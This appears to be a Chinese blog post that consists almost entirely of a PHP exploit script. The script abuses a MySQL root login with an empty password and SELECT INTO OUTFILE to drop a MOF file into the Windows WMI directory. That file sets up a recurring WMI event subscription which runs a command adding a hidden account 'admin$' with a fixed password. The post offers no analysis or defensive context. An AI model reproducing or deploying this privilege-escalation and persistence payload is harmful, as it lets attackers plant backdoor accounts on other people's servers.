代码如下:
<?php
$mysql_server_name=’localhost’;
$mysql_username=’root’;
$mysql_password=”;
$mysql_database=’mysql’;
$conn=mysql_connect($mysql_server_name,$mysql_username,$mysql_password,$mysql_database);
$cmdshell="net user admin$ qwe!@#123qwe /add";
$payload = "#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"$cmdshell\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};";
mysql_select_db($mysql_database,$conn);
$sql="select ‘$payload’ into outfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;";
$result=mysql_query($sql);
mysql_close($conn);
?>

发表评论

电子邮件地址不会被公开。 必填项已用*标注